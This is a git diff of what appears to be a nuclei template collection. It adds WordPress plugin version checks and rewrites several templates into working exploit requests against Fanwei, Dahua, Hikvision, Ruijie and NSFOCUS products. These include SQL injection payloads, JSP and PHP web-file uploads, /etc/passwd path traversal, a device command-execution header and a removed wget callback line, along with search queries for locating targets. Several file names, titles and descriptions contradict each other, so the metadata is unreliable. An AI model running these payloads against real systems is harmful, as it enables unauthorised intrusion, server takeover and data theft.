+++ b/poc/sql/houzez-9a635670fedb497fead8ede7dc06b417.yaml
@@ -0,0 +1,59 @@
+id: houzez-9a635670fedb497fead8ede7dc06b417
+
+info:
+ name: >
+ Houzez <= 3.2.4 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/2ceaa52e-564d-4454-8e3b-dc6899c910dd?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/themes/houzez/"
+ google-query: inurl:"/wp-content/themes/houzez/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-theme,houzez,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/houzez/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "houzez"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.2.4')
\ No newline at end of file
diff --git a/poc/sql/html5-video-player-66d1c126fdb6da3483cf3a67e28954d4.yaml b/poc/sql/html5-video-player-66d1c126fdb6da3483cf3a67e28954d4.yaml
new file mode 100644
index 0000000000..3c3326fc0b
--- /dev/null
+++ b/poc/sql/html5-video-player-66d1c126fdb6da3483cf3a67e28954d4.yaml
@@ -0,0 +1,59 @@
+id: html5-video-player-66d1c126fdb6da3483cf3a67e28954d4
+
+info:
+ name: >
+ Flash & HTML5 Video <= 2.5.31 - Authenticated (Subscriber+) Information Exposure
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/604862d9-e032-4806-8a14-3e4ad0ae1ee2?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/html5-video-player/"
+ google-query: inurl:"/wp-content/plugins/html5-video-player/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,html5-video-player,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/html5-video-player/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "html5-video-player"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.5.31')
\ No newline at end of file
diff --git a/poc/sql/newsletters-lite-5aa068832cbc4a3ddba8709b001a467b.yaml b/poc/sql/newsletters-lite-5aa068832cbc4a3ddba8709b001a467b.yaml
new file mode 100644
index 0000000000..c516483860
--- /dev/null
+++ b/poc/sql/newsletters-lite-5aa068832cbc4a3ddba8709b001a467b.yaml
@@ -0,0 +1,59 @@
+id: newsletters-lite-5aa068832cbc4a3ddba8709b001a467b
+
+info:
+ name: >
+ Newsletters <= 4.9.8 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/64de1220-52f5-46a9-b8ba-cf808d5d2e29?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/newsletters-lite/"
+ google-query: inurl:"/wp-content/plugins/newsletters-lite/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,newsletters-lite,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/newsletters-lite/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "newsletters-lite"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.9.8')
\ No newline at end of file
diff --git a/poc/sql/ultimate-addons-for-elementor-db4b4ab3d95ad9ae34552e25c8355457.yaml b/poc/sql/ultimate-addons-for-elementor-db4b4ab3d95ad9ae34552e25c8355457.yaml
new file mode 100644
index 0000000000..9ece6e3aa1
--- /dev/null
+++ b/poc/sql/ultimate-addons-for-elementor-db4b4ab3d95ad9ae34552e25c8355457.yaml
@@ -0,0 +1,59 @@
+id: ultimate-addons-for-elementor-db4b4ab3d95ad9ae34552e25c8355457
+
+info:
+ name: >
+ Mega Addons For Elementor <= 1.9 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a64c67de-1c16-4dcb-a3e4-81341b37c3e3?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/ultimate-addons-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/ultimate-addons-for-elementor/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,ultimate-addons-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ultimate-addons-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ultimate-addons-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.9')
\ No newline at end of file
diff --git a/poc/sql/void-elementor-post-grid-addon-for-elementor-page-builder-22cbef1e4db19d01d48f246c6b5e8449.yaml b/poc/sql/void-elementor-post-grid-addon-for-elementor-page-builder-22cbef1e4db19d01d48f246c6b5e8449.yaml
new file mode 100644
index 0000000000..0b3c5fb47b
--- /dev/null
+++ b/poc/sql/void-elementor-post-grid-addon-for-elementor-page-builder-22cbef1e4db19d01d48f246c6b5e8449.yaml
@@ -0,0 +1,59 @@
+id: void-elementor-post-grid-addon-for-elementor-page-builder-22cbef1e4db19d01d48f246c6b5e8449
+
+info:
+ name: >
+ Void Elementor Post Grid Addon for Elementor Page builder <= 2.3 - Authenticated (Contributor+) Local File Inclusion
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/15178478-5208-4869-a9f0-07e8e11ef0d5?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/void-elementor-post-grid-addon-for-elementor-page-builder/"
+ google-query: inurl:"/wp-content/plugins/void-elementor-post-grid-addon-for-elementor-page-builder/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,void-elementor-post-grid-addon-for-elementor-page-builder,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/void-elementor-post-grid-addon-for-elementor-page-builder/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "void-elementor-post-grid-addon-for-elementor-page-builder"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.3')
\ No newline at end of file
diff --git a/poc/sql/wpforo-3618db85525168de727aa60e2eab2dfa.yaml b/poc/sql/wpforo-3618db85525168de727aa60e2eab2dfa.yaml
new file mode 100644
index 0000000000..3f5e5ea6fa
--- /dev/null
+++ b/poc/sql/wpforo-3618db85525168de727aa60e2eab2dfa.yaml
@@ -0,0 +1,59 @@
+id: wpforo-3618db85525168de727aa60e2eab2dfa
+
+info:
+ name: >
+ wpForo Forum <= 2.3.4 - Unauthenticated Sensitive Information Exposure
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/99650c4d-d8ef-4970-af65-b22b7fdf3543?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wpforo/"
+ google-query: inurl:"/wp-content/plugins/wpforo/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wpforo,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wpforo/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wpforo"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.3.4')
\ No newline at end of file
diff --git a/poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml b/poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml
index 4e7ede529c..8c93d2bd55 100644
--- a/poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml
+++ b/poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml
@@ -1,29 +1,39 @@
id: FanWei
-
info:
- name: FanWei HrmCareerApplyPerView SQL Injection Vulnerability
+ name: FanWei Micro OA E-Office Uploadify Arbitrary File Upload Vulnerability
author: Zero Trust Security Attack and Defense Laboratory
severity: high
description: |
- FanWei There is a HrmCareerApplyPerView SQL injection vulnerability that hackers can use to obtain sensitive information-
+ The pan micro OA E-Office uploads files in uploadify.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability
metadata:
- fofa-query: app="泛微-协同办公OA"
- hunter-query: web.title="泛微-协同办公OA"
-
+ fofa-query: app="泛微-EOffice"
+ hunter-query: web.title="泛微软件"
http:
- raw:
- |
- GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%271%27)),db_name(1),5,6,7 HTTP/1.1
+ POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
Host: {{Hostname}}
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)
- Accept-Encoding: gzip, deflate
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Connection: close
+ Content-Length: 259
+ Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4
+ Accept-Encoding: gzip
+
+ --e64bdf16c554bbc109cecef6451c26a4
+ Content-Disposition: form-data; name="Filedata"; filename="test.php"
+ Content-Type: image/jpeg
+
+
+
+ --e64bdf16c554bbc109cecef6451c26a4--
req-condition: true
matchers:
- type: dsl
dsl:
- - 'contains(body_1, "c4ca")'
+ - 'status_code_1 == 200 && len(body) > 0'
condition: and
+
+# /attachment/3466744850/xxx.php
diff --git a/poc/upload/Dahua_Video_FileUpload.yaml b/poc/upload/Dahua_Video_FileUpload.yaml
index 77936cf562..78d89c1465 100644
--- a/poc/upload/Dahua_Video_FileUpload.yaml
+++ b/poc/upload/Dahua_Video_FileUpload.yaml
@@ -1,31 +1,29 @@
id: Dahua
info:
- name: Dahua Smart Park Comprehensive Management Platform User_ GetUserInfoByUserName.action Account Password Disclosure Vulnerability
+ name: Dahua Smart Park Comprehensive Management Platform getFaceCapture SQL Injection Vulnerability
author: Zero Trust Security Attack and Defense Laboratory
- severity: medium
+ severity: high
description: |
- Dahua Smart Park Comprehensive Management Platform User_ API interface exists in getUserInfoByUserName.action, which leads to password leakage of the management park account
+ There is an SQL injection vulnerability in the getFaceCapture interface of Dahua Smart Park Comprehensive Management Platform, which allows attackers to execute arbitrary SQL statements and obtain sensitive database information through the vulnerability
metadata:
fofa-query: app="dahua-智慧园区综合管理平台"
hunter-query: web.body="/WPMS/asset/lib/json2.js"
+
+
http:
- method: GET
path:
- - "{{BaseURL}}/admin/user_getUserInfoByUserName.action?userName=system"
+ - "{{BaseURL}}/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--%22%7D/extend/%7B%7D"
matchers-condition: and
matchers:
- type: word
part: body
words:
- - "loginName"
- - "loginPass"
+ - "c4ca"
- type: status
status:
- - 200
-
-# 获取后访问地址
-# /admin/login_login.action
+ - 500
diff --git a/poc/upload/Hikvision_iVMS-8700_Fileupload_Files.yaml b/poc/upload/Hikvision_iVMS-8700_Fileupload_Files.yaml
index e86e8491d1..538f6fd6d5 100644
--- a/poc/upload/Hikvision_iVMS-8700_Fileupload_Files.yaml
+++ b/poc/upload/Hikvision_iVMS-8700_Fileupload_Files.yaml
@@ -1,19 +1,20 @@
id: HiKVISION
info:
- name: HiKVISION Comprehensive Security Management Platform Report Arbitrary File Upload Vulnerability
+ name: HiKVISION Comprehensive Security Management Platform Files Arbitrary File Upload Vulnerability
author: Zero Trust Security Attack and Defense Laboratory
severity: high
description: |
- There is an arbitrary file upload vulnerability in the HiKVISION comprehensive security management platform report interface. Attackers can upload arbitrary files and obtain server privileges by constructing special request packets
+ HiKVISION comprehensive security management platform files interface has an arbitrary file upload vulnerability, allowing attackers to upload arbitrary files through the vulnerability
metadata:
fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台"
hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685"
+
http:
- raw:
- |
- POST /svm/api/external/report HTTP/1.1
+ POST /center/api/files;.html HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a
@@ -24,17 +25,11 @@ http:
<%out.print("test");%>
------WebKitFormBoundary9PggsiM755PLa54a--
- - |
- GET /portal/ui/login/..;/..;/test.jsp HTTP/1.1
- Host: {{Hostname}}
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
-
+
req-condition: true
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200'
- - 'contains(body_1, "data")'
- - 'status_code_2 == 200'
- - 'contains(body_2, "test")'
+ - 'contains(body_1, "test.jsp")'
condition: and
diff --git a/poc/upload/Hikvision_iVMS-8700_upload_action.yaml b/poc/upload/Hikvision_iVMS-8700_upload_action.yaml
index 7f081b05e0..7e328a8b1b 100644
--- a/poc/upload/Hikvision_iVMS-8700_upload_action.yaml
+++ b/poc/upload/Hikvision_iVMS-8700_upload_action.yaml
@@ -1,48 +1,50 @@
id: HIKVISION
info:
- name: HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 upload Webshell file
- author: Zero Trust Security Attack and Defense Laboratory
+ name: HHIKVISION iVMS-8700 upload Webshell file
+ author: zerZero Trust Security Attack and Defense Laboratory
severity: high
description: |
- HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 There is an arbitrary file upload vulnerability where attackers can control the server by sending specific request packets to upload Webshell files
+ HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file
metadata:
fofa-query: icon_hash="-911494769"
hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685"
variables:
- str1: '{{rand_base(6)}}'
- str2: '{{rand_base(6)}}'
- str3: '<%out.print("{{str2}}");%>'
+ str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding'
http:
- raw:
- |
- POST /eps/resourceOperations/upload.action HTTP/1.1
+ POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1
Host: {{Hostname}}
- User-Agent: MicroMessenger
- Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj
-
- ------WebKitFormBoundaryTJyhtTNqdMNLZLhj
- Content-Disposition: form-data; name="fileUploader";filename="{{str1}}.jsp"
+ User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ Connection: close
+ Content-Length: 184
+ Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15
+
+ --c4155aff43901a8b2a19a4641a5efa15
+ Content-Disposition: form-data; name="fileUploader"; filename="test.jsp"
Content-Type: image/jpeg
- {{str3}}
- ------WebKitFormBoundaryTJyhtTNqdMNLZLhj--
+ {{randstr}}
+ --c4155aff43901a8b2a19a4641a5efa15--
- |
- GET /eps/upload/{{res_id}}.jsp HTTP/1.1
+ GET /eps/upload/{{name}}.jsp HTTP/1.1
Host: {{Hostname}}
extractors:
- type: json
- name: res_id
+ name: name
json:
- ".data.resourceUuid"
internal: true
matchers:
- - type: dsl
- dsl:
- - body_2 == str2
+ - type: word
+ words:
+ - '{{randstr}}'
diff --git a/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml b/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml
index b35ef84818..1cd783867f 100644
--- a/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml
+++ b/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml
@@ -1,11 +1,11 @@
id: Green-Alliance
info:
- name: Green Alliance SAS Fortress Exec Remote Command Execution Vulnerability
+ name: Green Alliance SAS Fortress GetFile Arbitrary File Read Vulnerability
author: Zero Trust Security Attack and Defense Laboratory
- severity: high
+ severity: medium
description: |
- Green Alliance SAS Fortress Exec Remote Command Execution Vulnerability
+ There is an arbitrary user login vulnerability in the Green Alliance Fortress machine, which allows attackers to exploit vulnerabilities including www/local_ User. php enables any user to log in
metadata:
fofa-query: body="'/needUsbkey.php?username='"
hunter-query: web.body="'/needUsbkey.php?username='"
@@ -14,36 +14,15 @@ info:
http:
- method: GET
path:
- - "{{BaseURL}}/webconf/Exec/index?cmd=id"
+ - "{{BaseURL}}/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: word
part: body
words:
- - "200"
+ - "nologin"
- type: status
status:
- 200
-
-
-# http:
-# - method: GET
-# path:
-# - "{{BaseURL}}/webconf/Exec/index?cmd=wget%20{{interactsh-url}}"
-
-# attack: clusterbomb
-# matchers-condition: or
-# matchers:
-# - type: word
-# part: interactsh_protocol
-# name: http
-# words:
-# - "http"
-
-# - type: word
-# part: interactsh_protocol
-# name: dns
-# words:
-# - "dns"
diff --git a/poc/upload/Ruijie_NBR_Router_fileupload.yaml b/poc/upload/Ruijie_NBR_Router_fileupload.yaml
index fa762ac2f6..f2db119795 100644
--- a/poc/upload/Ruijie_NBR_Router_fileupload.yaml
+++ b/poc/upload/Ruijie_NBR_Router_fileupload.yaml
@@ -1,37 +1,33 @@
id: Ruijie
info:
- name: Ruijie NBR Router fileupload.php Arbitrary File Upload Vulnerability
+ name: Ruijie Switch WEB Management System EXCU_ SHELL
author: Zero Trust Security Attack and Defense Laboratory
severity: high
description: |
- Ruijie NBR router has an arbitrary file upload vulnerability in the fileupload.php file, which allows attackers to upload arbitrary files to the server and obtain server privileges
+ Ruijie Switch WEB Management System EXCU_ SHELL
metadata:
- fofa-query: app="Ruijie-NBR路由器"
- hunter-query: web.title="锐捷网络 --NBR路由器--登录界面"
+ fofa-query: body="img/free_login_ge.gif" && body="./img/login_bg.gif"
+ hunter-query: web.body="img/free_login_ge.gif"&&body="./img/login_bg.gif"
http:
- raw:
- |
- POST /ddi/server/fileupload.php?uploadDir=../../321&name=test.php HTTP/1.1
+ GET /EXCU_SHELL HTTP/1.1
Host: {{Hostname}}
- Accept: text/plain, */*; q=0.01
- Content-Disposition: form-data; name="file"; filename="111.php"
- Content-Type: image/jpeg
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.2852.74 Safari/537.36
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ Connection: close
+ Cmdnum: '1'
+ Command1: show running-config
+ Confirm1: n
-
- - |
- GET /321/test.php HTTP/1.1
- Host: {{Hostname}}
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
-
req-condition: true
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200'
- - 'status_code_2 == 200'
- - 'contains(body_1, "test.php")'
- - 'contains(body_2, "PHP Version")'
+ - 'contains(body_1, "configuration")'
condition: and
diff --git a/poc/upload/dahua-wpms-addimgico-fileupload.yaml b/poc/upload/dahua-wpms-addimgico-fileupload.yaml
index fa3aafbfe2..c7afb0444b 100644
--- a/poc/upload/dahua-wpms-addimgico-fileupload.yaml
+++ b/poc/upload/dahua-wpms-addimgico-fileupload.yaml
@@ -1,68 +1,50 @@
id: CVE-2023-3836
info:
- name: Dahua Smart Park Management - Arbitrary File Upload
- author: HuTa0
- severity: critical
+ name: 大华-WPMS-upload-addimgico
+ author: hufei
+ severity: high
description: |
- Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.
- remediation: |
- Apply the latest security patch or update provided by the vendor to fix the arbitrary file upload vulnerability.
+ 大华 智慧园区综合管理平台 devicePoint_addImgIco 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,控制服务器权限
reference:
- - https://github.com/qiuhuihk/cve/blob/main/upload.md
- - https://nvd.nist.gov/vuln/detail/CVE-2023-3836
- - https://vuldb.com/?ctiid.235162
- - https://vuldb.com/?id.235162
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2023-3836
- cwe-id: CWE-434
- epss-score: 0.03083
- epss-percentile: 0.8997
- cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:*
+ https://github.com/PeiQi0/PeiQi-WIKI-Book/tree/main/docs/wiki/iot/%E5%A4%A7%E5%8D%8E
metadata:
+ max-request: 1
+ fofa-query: app="大华-智慧园区综合管理平台"
+ hunter-query: app.name="Dahua 大华 智慧园区管理平台"
verified: true
- max-request: 2
- vendor: dahuasecurity
- product: smart_parking_management
- shodan-query: html:"/WPMS/asset"
- zoomeye-query: /WPMS/asset
- tags: cve,cve2023,dahua,fileupload,intrusive,rce
-variables:
- random_str: "{{rand_base(6)}}"
- match_str: "{{md5(random_str)}}"
http:
- raw:
- |
POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
- Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_8 like Mac OS X) AppleWebKit/533.0 (KHTML, like Gecko) FxiOS/11.8w0575.0 Mobile/69G115 Safari/533.0
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ Connection: close
+ Content-Length: 177
+ Content-Type: multipart/form-data; boundary=e00b34d08d13639f8b619829b04c1a29
- --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
- Content-Disposition: form-data; name="upload"; filename="{{random_str}}.jsp"
- Content-Type: application/octet-stream
- Content-Transfer-Encoding: binary
+ --e00b34d08d13639f8b619829b04c1a29
+ Content-Disposition: form-data; name="upload"; filename="test.jsp"
+ Content-Type: image/gif
+
+ {{randstr}}
+ --e00b34d08d13639f8b619829b04c1a29--
- {{match_str}}
- --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--
- |
- GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1
+ GET /upload/emap/society_new/{{name}} HTTP/1.1
Host: {{Hostname}}
- matchers:
- - type: dsl
- dsl:
- - "status_code_1 == 200 && status_code_2 == 200"
- - "contains(body_2, '{{match_str}}')"
- condition: and
-
extractors:
- - type: regex
- name: shell_filename
+ - type: json
+ name: name
+ json:
+ - ".data"
internal: true
- part: body_1
- regex:
- - 'ico_res_(\w+)_on\.jsp'
-# digest: 4b0a00483046022100abbf084a12dda14741c23c4c2c7c8e7b6e231142a8333a69df8844ea1271532d022100a7a0d0f5b8caf3beb1708fed446cd4bf7efbe83fc8fa26aae836cb243dd64804:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+
+ matchers:
+ - type: word
+ words:
+ - '{{randstr}}'
\ No newline at end of file
diff --git a/poc/wordpress/dahua-wpms-addimgico-fileupload.yaml b/poc/wordpress/dahua-wpms-addimgico-fileupload.yaml
index fa3aafbfe2..c7afb0444b 100644
--- a/poc/wordpress/dahua-wpms-addimgico-fileupload.yaml
+++ b/poc/wordpress/dahua-wpms-addimgico-fileupload.yaml
@@ -1,68 +1,50 @@
id: CVE-2023-3836
info:
- name: Dahua Smart Park Management - Arbitrary File Upload
- author: HuTa0
- severity: critical
+ name: 大华-WPMS-upload-addimgico
+ author: hufei
+ severity: high
description: |
- Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.
- remediation: |
- Apply the latest security patch or update provided by the vendor to fix the arbitrary file upload vulnerability.
+ 大华 智慧园区综合管理平台 devicePoint_addImgIco 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,控制服务器权限
reference:
- - https://github.com/qiuhuihk/cve/blob/main/upload.md
- - https://nvd.nist.gov/vuln/detail/CVE-2023-3836
- - https://vuldb.com/?ctiid.235162
- - https://vuldb.com/?id.235162
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2023-3836
- cwe-id: CWE-434
- epss-score: 0.03083
- epss-percentile: 0.8997
- cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:*
+ https://github.com/PeiQi0/PeiQi-WIKI-Book/tree/main/docs/wiki/iot/%E5%A4%A7%E5%8D%8E
metadata:
+ max-request: 1
+ fofa-query: app="大华-智慧园区综合管理平台"
+ hunter-query: app.name="Dahua 大华 智慧园区管理平台"
verified: true
- max-request: 2
- vendor: dahuasecurity
- product: smart_parking_management
- shodan-query: html:"/WPMS/asset"
- zoomeye-query: /WPMS/asset
- tags: cve,cve2023,dahua,fileupload,intrusive,rce
-variables:
- random_str: "{{rand_base(6)}}"
- match_str: "{{md5(random_str)}}"
http:
- raw:
- |
POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
- Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_8 like Mac OS X) AppleWebKit/533.0 (KHTML, like Gecko) FxiOS/11.8w0575.0 Mobile/69G115 Safari/533.0
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ Connection: close
+ Content-Length: 177
+ Content-Type: multipart/form-data; boundary=e00b34d08d13639f8b619829b04c1a29
- --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
- Content-Disposition: form-data; name="upload"; filename="{{random_str}}.jsp"
- Content-Type: application/octet-stream
- Content-Transfer-Encoding: binary
+ --e00b34d08d13639f8b619829b04c1a29
+ Content-Disposition: form-data; name="upload"; filename="test.jsp"
+ Content-Type: image/gif
+
+ {{randstr}}
+ --e00b34d08d13639f8b619829b04c1a29--
- {{match_str}}
- --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--
- |
- GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1
+ GET /upload/emap/society_new/{{name}} HTTP/1.1
Host: {{Hostname}}
- matchers:
- - type: dsl
- dsl:
- - "status_code_1 == 200 && status_code_2 == 200"
- - "contains(body_2, '{{match_str}}')"
- condition: and
-
extractors:
- - type: regex
- name: shell_filename
+ - type: json
+ name: name
+ json:
+ - ".data"
internal: true
- part: body_1
- regex:
- - 'ico_res_(\w+)_on\.jsp'
